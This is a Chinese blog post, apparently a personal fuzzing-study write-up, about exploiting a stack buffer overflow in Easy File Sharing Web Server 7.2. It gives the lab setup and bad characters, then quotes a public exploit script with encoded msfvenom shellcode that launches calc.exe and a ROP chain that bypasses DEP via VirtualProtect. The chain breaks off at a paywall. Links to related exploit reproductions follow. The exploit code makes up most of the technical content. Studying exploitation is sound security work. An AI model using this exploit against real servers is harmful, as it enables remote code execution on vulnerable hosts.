fuzzing-03-Easy File Sharing Web Server7.2分析和利用

最新推荐文章于 2022-11-05 14:53:25 发布
最新推荐文章于 2022-11-05 14:53:25 发布
阅读量2.5k 收藏
点赞数
分类专栏: fuzzing学习 文章标签: fuzzing 二进制漏洞分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dhfttkl123/article/details/74940920
版权
本文详细介绍了针对Easy File Sharing Web Server 7.2的fuzzing分析过程,包括软件逆向、关键函数(fun_0042d44d, fun_0041625d, fun_0049758A)的逆向工程和最终的漏洞利用方法。" 86238853,8179096,STM32独立看门狗(IWDG)配置与使用,"['STM32开发', '嵌入式系统', '微控制器', 'C语言', '驱动编程']
摘要由CSDN通过智能技术生成

0x00前言

首先,为什么没有fuzzing-02。。。因为在写02的时候,发现还是重复第一篇的相关内容,写一半就停了,不过03是我第一次分析别人没分析过的软件,并且独立编写shellcode,所以记录一下留作自己的参考。
目标:win7 x64 sp1
源:win10(python)
软件:Easy File Sharing Web Server(7.2)、Windbg、Immunity Debugger、IDA、msfvenom(Metasploit)
坏字符 : '\x00\x0A\x0D'

0x01软件逆向开始

一开始很简单,就和平常一样,先下载7.2的软件,然后安装打开,百度查找POC,然后让软件崩溃就好了。先附上自己找到的POC代码。 
#!/usr/bin/python

# Exploit Title: Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow (DEP Bypass with ROP)
# Exploit Author: bl4ck h4ck3r
# Software Link: http://www.sharing-file.com/efssetup.exe
# Version: Easy File Sharing Web Server v7.2
# Tested on: Windows XP SP2, Windows 2008 R2 x64

import socket
import struct
import sys

if len(sys.argv) < 2:
    print "\nUsage: " + sys.argv[0] + " <host>\n"
    exit()

# 0x1002280a :  # ADD ESP,1004 # RETN    ** [ImageLoad.dll] **   |  ascii {PAGE_EXECUTE_READ}
ret = struct.pack("<I", 0x1002280a)

# nopsled
shellcode = "\x90"*200

# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -v shellcode -f python
shellcode += "\x89\xe7\xd9\xec\xd9\x77\xf4\x5d\x55\x59\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
shellcode += "\x39\x6c\x5a\x48\x6b\x32\x55\x50\x67\x70\x47\x70"
shellcode += "\x75\x30\x6e\x69\x78\x65\x65\x61\x39\x50\x31\x74"
shellcode += "\x4c\x4b\x50\x50\x46\x50\x4c\x4b\x36\x32\x36\x6c"
shellcode += "\x6c\x4b\x66\x32\x42\x34\x6c\x4b\x52\x52\x77\x58"
shellcode += "\x54\x4f\x4c\x77\x63\x7a\x31\x36\x66\x51\x4b\x4f"
shellcode += "\x4e\x4c\x47\x4c\x73\x51\x73\x4c\x76\x62\x76\x4c"
shellcode += "\x51\x30\x59\x51\x78\x4f\x46\x6d\x76\x61\x48\x47"
shellcode += "\x6a\x42\x79\x62\x50\x52\x50\x57\x4c\x4b\x63\x62"
shellcode += "\x36\x70\x4e\x6b\x30\x4a\x37\x4c\x6e\x6b\x42\x6c"
shellcode += "\x42\x31\x33\x48\x49\x73\x50\x48\x33\x31\x6a\x71"
shellcode += "\x42\x71\x4c\x4b\x63\x69\x47\x50\x45\x51\x4a\x73"
shellcode += "\x6c\x4b\x72\x69\x44\x58\x6b\x53\x67\x4a\x42\x69"
shellcode += "\x6e\x6b\x45\x64\x4c\x4b\x46\x61\x6b\x66\x35\x61"
shellcode += "\x39\x6f\x6c\x6c\x6b\x71\x58\x4f\x34\x4d\x46\x61"
shellcode += "\x6b\x77\x44\x78\x6d\x30\x71\x65\x59\x66\x64\x43"
shellcode += "\x61\x6d\x48\x78\x67\x4b\x61\x6d\x74\x64\x32\x55"
shellcode += "\x4d\x34\x42\x78\x6e\x6b\x32\x78\x44\x64\x56\x61"
shellcode += "\x68\x53\x62\x46\x4e\x6b\x36\x6c\x70\x4b\x4c\x4b"
shellcode += "\x56\x38\x35\x4c\x56\x61\x59\x43\x6c\x4b\x76\x64"
shellcode += "\x4c\x4b\x56\x61\x78\x50\x6e\x69\x61\x54\x37\x54"
shellcode += "\x55\x74\x53\x6b\x63\x6b\x63\x51\x32\x79\x71\x4a"
shellcode += "\x36\x31\x69\x6f\x4b\x50\x43\x6f\x31\x4f\x73\x6a"
shellcode += "\x6e\x6b\x36\x72\x58\x6b\x4c\x4d\x53\x6d\x52\x4a"
shellcode += "\x47\x71\x4c\x4d\x6f\x75\x48\x32\x43\x30\x53\x30"
shellcode += "\x67\x70\x32\x70\x31\x78\x34\x71\x4e\x6b\x32\x4f"
shellcode += "\x6c\x47\x39\x6f\x68\x55\x4f\x4b\x4c\x30\x68\x35"
shellcode += "\x4f\x52\x33\x66\x50\x68\x79\x36\x5a\x35\x6d\x6d"
shellcode += "\x4d\x4d\x49\x6f\x68\x55\x55\x6c\x76\x66\x53\x4c"
shellcode += "\x75\x5a\x6b\x30\x59\x6b\x59\x70\x72\x55\x33\x35"
shellcode += "\x6f\x4b\x37\x37\x76\x73\x74\x32\x70\x6f\x50\x6a"
shellcode += "\x67\x70\x50\x53\x59\x6f\x69\x45\x65\x33\x75\x31"
shellcode += "\x62\x4c\x61\x73\x46\x4e\x75\x35\x30\x78\x72\x45"
shellcode += "\x45\x50\x41\x41"

def create_rop_chain():
	
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
		# 0x00000000,  # [-] Unable to find gadget to put 00000201 into ebx
		0x10015442,  # POP EAX # RETN [ImageLoad.dll]
		0xFFFFFDFE,  # -202
		0x100231d1,  # NEG EAX # RETN [ImageLoad.dll]
		0x1001da09,  # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]|   {PAGE_EXECUTE_READ}
		0x1001a858,  # RETN (ROP NOP) [ImageLoad.dll]
		0x1001a858,  # RETN (ROP NOP) [ImageLoad.dll]
		0x10015442,  # POP EAX # RETN [ImageLoad.dll]
		0x1004de84,  # &Writable location [ImageLoad.dll]

		0x10015442,  # POP EAX # RETN [ImageLoad.dll]
		0x61c832d0,  # ptr to &VirtualProtect() [IAT sqlite3.dll]
		0x1002248c,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
		0x61c0a798,  # XCHG EAX,EDI # RETN [sqlite3.dll]
		0x1001d626,  # XOR ESI,ESI # RETN [ImageLoad.dll]
		0x10021a3e,  # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll]
		0x100218f9,  # POP EBP # RETN [ImageLoad.dll]
		0x61c24169,  # & push esp # ret  [sqlite3.dll]
		0x10022c4c,  # XOR EDX,EDX # RETN [ImageLoad.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
		0x61c066be,  # INC EDX # ADD
最低0.47元/天 解锁文章
Easy File Sharing Web Server 7.2 - 'POST' 缓冲区溢出漏洞分析
giantbranch的专栏
07-26 2619
简介看到这个软件,之前不是GET请求缓冲区溢出吗? (附上我的分析链接:http://blog.csdn.net/u012763794/article/details/66970749)这次有个POST,看看有没有新鲜的东西啊!参考:https://www.exploit-db.com/exploits/42165/实验环境 WinXP sp3 中文版 EFS Web Server7.
Easy File Sharing Web Server 7.2 漏洞分析利用
qq_36811299的博客
08-16 2716
Easy File Sharing Web Server 漏洞
Easy File Sharing Web Server 7.2
01-15
Easy File Sharing Web Server 是一种允许访客容易地经由浏览器上传/下载文件的文件分享系统.
最好的web文件分享工具Easy File Sharing Web Server
05-26
Easy File Sharing Web Server允许用户不需要任何附加的软件或服务就可以架设一个安全的、基于网页的P2P文件分享、传输系统。 除了HTML网页界面设计,Easy File Sharing Web Server还可以让你直接在自己的PC上快速架起一个网站,你可以用它来和朋友们分享照片、音乐、视频,还可以让其它用户通过一个简单的网页界面上传自己的收藏到你的PC伤,真正达到分享资源的目的。
Easy File Sharing Server漏洞利用
rrorb的博客
11-14 4377
1、以windows系统作为靶机并运行easy file sharing server 2、使用nmap对Windows进行端口扫描 nmap -sV10.**.***.**(windowsip) 扫描到80端口运行了easy file sharing server 3、搜索可利用漏洞脚本 searchsploit Easy File Sharing Web Server 扫描到很多可利用脚本,这里我们选取其中一个作为漏洞脚本利用 4、分析脚本,脚本39009.py使用python编程
Peach-Fuzzing-master
12-26
《Peach Fuzzing:深度探索数据模糊变异测试在渗透测试中的应用》 Peach Fuzzing,全称为Peach Fuzzer,...通过深入学习和实践,我们可以利用Peach Fuzzing-master来提升软件的安全性,保护企业和用户的利益不受侵犯。
Web-Fuzzing-Box-main各种字典
04-13
在这个压缩包"Web-Fuzzing-Box-main"中,包含的主要内容很可能是各种用于模糊测试的字典文件。 字典文件在模糊测试中扮演着关键角色,它们包含了各种可能的输入值,如常见的字符串、特殊字符、HTTP头、用户名、密码...
Web_Fuzzing_Box_-_Web_模糊测试字典与一些Payloads_Web-Fuzzing-Box.zip
最新发布
08-27
Web_Fuzzing_Box_-_Web_模糊测试字典与一些Payloads_Web-Fuzzing-Box
存放openKylin社区fuzzing技术研究的文档和成果fuzzing-master
12-17
在openKylin社区的fuzzing项目中,可能会有详细的文档介绍如何设置和运行模糊测试,以及如何分析和解释测试结果。此外,该项目可能还会包含一些成功的案例和最佳实践,供其他开发者参考和学习。通过参与社区,...
Easy File Sharing Web Server 7.2.zip.7z
12-15
Easy File Sharing Web Server 是一种允许访客容易地经由浏览器上传/下载文件的文件分享系统,在对password进行字符串拷贝的时候,没有控制长度,导致缓冲区溢出。
easy file sharing server漏洞利用
m0_56368726的博客
11-07 429
1、首先在winxp靶机上安装efssetup_2018.zip,并运行 2、扫描靶机进行的服务 使用nmap进行主动扫描,命令为nmap -sV 192.168.56.131。 可以看到靶机的80端口提供的服务为easy file sharing server。 3、查找漏洞渗透模块 我们可以用“searchsploit"命令在kali中查找所需要的渗透模块。 我们这里以这个漏洞渗透模块为例,这个脚本使用python写的,利用溢出漏洞实现了在靶机执行计算器程序。 ...
Easy File Sharing Web Server 漏洞的简单利用
qq_51302564的博客
12-15 1226
Easy File Sharing Web Server 漏洞的简单利用 个人博客:https://fly-pluche.github.io/posts/Easy%20File%20Sharing%20Web%20Server/ 背景 EFS Easy File Sharing (EFS) Web Server是荷兰EFS Software公司的一套集论坛网站,文件上传、下载、共享和图片共享等功能的文件共享软件。 EFS EFS Web Server 7.2版本中存在基于栈的缓冲区溢出漏洞。远程攻击者
Easy File Sharing Server7.2漏洞复现
aarong的博客
11-04 1715
easy file sharing server7.2漏洞复现 漏洞简述 easy file sharing server缓冲区漏洞 实验环境 攻击机:kali linux 靶机:windows(这里我使用的靶机是winsever2003) 配置在同一网络环境下(同网段) 复现过程 (1)首先在靶机中安装easy file sharing server软件 (2)因为靶机有IIS可以占用了80端口,所以在这里设置一下服务部署的端口为8000,点击Restart: (3)打开网站查看是否修改成功 (4)
Easy File Sharing Web Server 缓冲区溢出漏洞利用
qq_42877870的博客
04-05 2307
Easy File Sharing Web Server 缓冲区溢出漏洞利用 1.首先我们先打开一台windows7系统的虚拟机,运行efssetup_2018并安装easy file sharing server 接着我们将easy file sharing web server的端口改为8000,并按下Restart键 从easy file sharing web s...
漏洞渗透测试:easy file sharing server
m0_64005272的博客
11-05 967
扫描对应端口服务的版本信息,发现8000端口的版本信息为easy file sharing server httpd 6.9。因为靶机上有IIS可能占用了80端口,所以在这里设置一下服务部署的端口为8000,点击Restart。用python运行这个脚本,运行成功。转到靶机上,发现软件自动关闭并打开了计算器,漏洞复现完毕。利用漏洞,在Kali终端输入searchsploit命令,查找渗透模块。靶机:windows(这里我使用的是win7)一路next即可,点击try it!
kali复现easy file sharing sever漏洞利用以及metasploit的简单应用
qq_51687418的博客
12-13 3210
一、easy file sharing server漏洞渗透测试 1.首先我们要在靶机安装efssetup_2018.exe程序,并运行该程序。 2.我们打开kali利用Nmap脚本扫描局域网内存活主机,发现靶机存活(Host is up)。再对目标靶机进行nmap (靶机)ip操作发现靶机80端口打开并且运行了Easy file server服务如图: kali本身有很多的漏洞利用脚本,我们在命令框输入指令查找easy file server漏洞利用脚本。 searchsploit easy file
91.vido.ws v.php,"token" parameter not in video info for unknown reason;
热门推荐
weixin_35307279的博客
03-29 94万+
youtube-dl -v --dump-pages https://www.youtube.com/watch?v=USg3NR76XpQ output[debug] System config: [][debug] User config: [u'--add-metadata', u'--user-agent', u'Mozilla/5.0 (X11; Ubuntu; Linux x86_64...
Easy File Sharing Web Server(缓冲区溢出漏洞)
Coffilater的博客
12-13 3498
缓冲区溢出简介 缓冲区溢出是指计算机向缓冲区内填充数据位数时超过了缓冲区本身的容量,溢出的数据覆盖在合法数据上。理想的情况是:程序会检查数据长度,而且并不允许输入超过缓冲区长度的字符。但是绝大多数程序都会假设数据长度总是与所分配的储存空间相匹配,这就为缓冲区溢出埋下隐患。操作系统所使用的缓冲区,又被称为“堆栈”,在各个操作进程之间,指令会被临时储存在“堆栈”当中,“堆栈”也会出现缓冲区溢出。 Easy File Sharing Web Server 漏洞复现 实验环境: 攻击机:kali L
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值